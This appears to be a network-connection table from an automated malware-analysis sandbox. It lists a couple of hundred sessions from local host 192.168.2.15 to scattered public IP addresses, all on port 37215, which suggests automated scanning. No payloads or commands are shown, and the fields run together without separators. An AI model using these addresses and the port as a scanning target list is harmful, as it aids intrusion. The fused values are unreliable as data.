                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6579192.168.2.154703441.243.115.2537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6580192.168.2.15567628.23.153.8337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6581192.168.2.1560482197.30.89.2337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6582192.168.2.153899641.39.15.3837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6583192.168.2.1552070180.109.160.9037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6584192.168.2.154405246.137.28.22137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6585192.168.2.154864241.146.141.12137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6586192.168.2.1547148164.255.162.17437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6587192.168.2.1552906177.6.210.4537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6588192.168.2.154985241.155.75.22937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6589192.168.2.1540414129.148.168.11837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6590192.168.2.1556796106.191.160.11037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6591192.168.2.154057641.179.78.7637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6592192.168.2.1543824187.42.118.1037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6593192.168.2.154890890.76.193.2837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6594192.168.2.1557408205.183.5.22237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6595192.168.2.15390762.122.138.4837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6596192.168.2.154928641.233.91.14937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6597192.168.2.1537676197.227.216.23437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6598192.168.2.155308841.124.93.11137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6599192.168.2.153416657.72.133.12537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6600192.168.2.1535012157.176.126.3237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6601192.168.2.1541854157.12.2.6337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6602192.168.2.1547834157.225.86.20437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6603192.168.2.1554298197.235.221.13937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6604192.168.2.154670639.155.115.24937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6605192.168.2.1549280157.151.131.23537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6606192.168.2.156068854.82.10.7137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6607192.168.2.154869041.51.66.7037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6608192.168.2.155479241.12.2.7237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6609192.168.2.1538300157.205.184.22237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6610192.168.2.1543080168.169.14.7637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6611192.168.2.1546274157.147.70.9737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6612192.168.2.1556414157.158.134.9437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6613192.168.2.153634441.111.39.5137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6614192.168.2.1556154157.118.196.2737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6615192.168.2.153861241.50.135.10837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6616192.168.2.1555660157.218.182.2037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6617192.168.2.154507641.102.50.8237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6618192.168.2.155229641.126.57.3937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6619192.168.2.1560244157.59.68.17137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6620192.168.2.1535430197.144.230.23037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6621192.168.2.154146241.211.121.14837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6622192.168.2.154129441.132.244.15237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6623192.168.2.1539804137.202.44.23437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6624192.168.2.1560426173.34.211.10037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6625192.168.2.153659241.235.211.20337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6626192.168.2.153654841.116.226.19137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6627192.168.2.155961641.126.201.18037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6628192.168.2.155583441.42.196.24137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6629192.168.2.1533412157.99.198.2637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6630192.168.2.1560132157.196.223.23937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6631192.168.2.1538272108.211.68.1137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6632192.168.2.1554058197.175.21.15437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6633192.168.2.1558184157.99.25.437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6634192.168.2.1550332197.69.30.21237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6635192.168.2.1533566197.92.161.637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6636192.168.2.155319841.72.251.6937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6637192.168.2.1547406183.56.204.4737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6638192.168.2.1549450157.244.112.22437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6639192.168.2.1547578157.102.228.14337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6640192.168.2.1548916157.209.57.14437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6641192.168.2.153811041.188.150.2537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6642192.168.2.153571041.167.154.11537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6643192.168.2.1560692197.61.186.17837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6644192.168.2.1536832203.207.107.11437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6645192.168.2.153772041.190.174.24637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6646192.168.2.1548704157.198.156.8837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6647192.168.2.1549344197.19.224.337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6648192.168.2.1544754157.70.40.10937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6649192.168.2.1541404157.125.240.20137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6650192.168.2.1537120157.19.26.20437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6651192.168.2.1544350157.82.207.13837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6652192.168.2.153494041.161.13.5137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6653192.168.2.154807641.67.255.13937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6654192.168.2.154418641.4.141.1437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6655192.168.2.153749841.219.112.5637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6656192.168.2.1545980122.223.248.8137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6657192.168.2.153563041.230.80.12937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6658192.168.2.1547954183.235.72.11337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6659192.168.2.1540976197.76.201.18737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6660192.168.2.155561441.77.120.19737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6661192.168.2.1557770157.97.102.537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6662192.168.2.1546358157.87.14.5337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6663192.168.2.15406882.2.98.6137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6664192.168.2.1541998197.92.88.737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6665192.168.2.1556812157.116.156.15837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6666192.168.2.154217679.231.85.12837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6667192.168.2.153697841.254.167.337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6668192.168.2.1533774197.77.179.22637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6669192.168.2.1540030157.57.139.3737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6670192.168.2.1548188197.234.54.11837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6671192.168.2.153526041.4.85.3437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6672192.168.2.155684841.141.186.15237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6673192.168.2.154448452.49.231.18737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6674192.168.2.1549332197.217.195.3037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6675192.168.2.155202241.73.109.24837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6676192.168.2.155937041.67.90.6037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6677192.168.2.1535434157.124.98.15437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6678192.168.2.154230841.185.210.6137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6679192.168.2.1552492197.183.12.23037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6680192.168.2.1550828143.7.85.20037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6681192.168.2.155434241.0.224.3637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6682192.168.2.1552794157.93.91.8437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6683192.168.2.1556354157.202.6.10237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6684192.168.2.1532858197.87.207.19337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6685192.168.2.155400041.205.46.12437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6686192.168.2.1556116197.139.126.23837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6687192.168.2.1560104197.154.203.237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6688192.168.2.1541652160.137.143.4737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6689192.168.2.1539410157.158.23.17037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6690192.168.2.155855641.249.198.9237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6691192.168.2.1551300169.201.201.22637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6692192.168.2.154435841.241.36.237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6693192.168.2.155972641.40.246.4637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6694192.168.2.1541724218.223.201.5037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6695192.168.2.1554994197.27.165.6337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6696192.168.2.1543682157.144.102.13137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6697192.168.2.153572641.9.34.10437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6698192.168.2.1548352197.234.124.2837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6699192.168.2.154550041.35.187.19237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6700192.168.2.155900412.67.6.18837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6701192.168.2.155336657.122.162.937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6702192.168.2.1559614197.206.149.5537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6703192.168.2.155530241.9.79.13037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6704192.168.2.155050841.76.2.7437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6705192.168.2.1538872157.3.56.22237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6706192.168.2.1547620157.208.36.7437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6707192.168.2.154944441.27.102.24537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6708192.168.2.1542148157.215.116.2137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6709192.168.2.1544058197.117.91.22937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6710192.168.2.1554618157.149.188.19737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6711192.168.2.154850641.238.138.5237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6712192.168.2.155408441.226.237.5337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6713192.168.2.1547758157.253.226.15437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6714192.168.2.154041641.136.50.21837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6715192.168.2.1559742197.20.231.1237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6716192.168.2.1540142197.129.37.24137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6717192.168.2.1541680146.174.158.12437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6718192.168.2.154292043.106.116.7337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6719192.168.2.155463441.192.218.8737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6720192.168.2.1553056157.3.232.7737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6721192.168.2.155679041.163.131.25237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6722192.168.2.155397641.61.157.17337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6723192.168.2.153803241.231.119.21937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6724192.168.2.1548350157.206.203.19137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6725192.168.2.1540228197.18.95.24637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6726192.168.2.154658841.114.158.14637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6727192.168.2.1548774197.175.78.14437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6728192.168.2.154543641.125.123.10137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6729192.168.2.155219241.126.47.15437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6730192.168.2.1549372197.249.34.3337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6731192.168.2.1556830216.190.200.17637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6732192.168.2.153770472.38.173.13537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6733192.168.2.154316263.35.171.16937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6734192.168.2.1560960197.49.133.22237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6735192.168.2.1540720157.45.251.137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6736192.168.2.1534466197.22.132.21037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6737192.168.2.1548718197.235.11.537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6738192.168.2.1547262157.152.57.18037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6739192.168.2.153974069.205.202.2937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6740192.168.2.1549606197.109.16.9537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6741192.168.2.153553441.134.74.7037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6742192.168.2.155331841.84.209.16837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6743192.168.2.1553072197.6.166.16137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6744192.168.2.1555064197.159.148.18437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6745192.168.2.1540400197.174.52.20737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6746192.168.2.1543136157.129.38.24437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6747192.168.2.1533230119.111.51.19137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6748192.168.2.155845641.17.106.13737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6749192.168.2.154365841.65.244.5137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6750192.168.2.153705641.19.131.20237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6751192.168.2.156080441.143.42.18437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6752192.168.2.1543690197.16.241.17637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6753192.168.2.155238064.34.153.10937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6754192.168.2.1557966101.163.131.5437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6755192.168.2.154929841.33.197.10637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6756192.168.2.1545414157.216.224.21837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6757192.168.2.1544868197.2.97.19137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6758192.168.2.153724441.35.238.7037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6759192.168.2.1548592157.120.83.11437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6760192.168.2.1541584197.156.228.7937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6761192.168.2.153355885.161.125.14537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6762192.168.2.153345686.93.173.15037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6763192.168.2.154578841.48.39.24037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6764192.168.2.1546166157.33.45.17037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6765192.168.2.1539806136.206.35.037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6766192.168.2.155964641.153.14.11137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6767192.168.2.1541228157.54.23.17237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6768192.168.2.1539952157.47.143.22237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6769192.168.2.1547800197.8.15.13537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6770192.168.2.1549624197.38.181.20637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6771192.168.2.1545190157.179.208.19137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6772192.168.2.1534510157.132.29.13537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6773192.168.2.1551552197.218.3.23837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6774192.168.2.1555980197.82.18.637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6775192.168.2.1556684157.113.29.1137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6776192.168.2.1545800157.246.153.14037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6777192.168.2.1535924220.85.213.22137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6778192.168.2.1542508197.124.196.14337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6779192.168.2.1556872197.46.10.12737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6780192.168.2.1532822157.1.48.10137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6781192.168.2.1550390157.102.98.6037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6782192.168.2.154839868.19.89.2637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6783192.168.2.154878041.250.48.10737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6784192.168.2.1537604157.154.18.12837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6785192.168.2.1543122197.254.25.5637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6786192.168.2.155043241.87.67.4237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6787192.168.2.1537106157.248.194.6437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
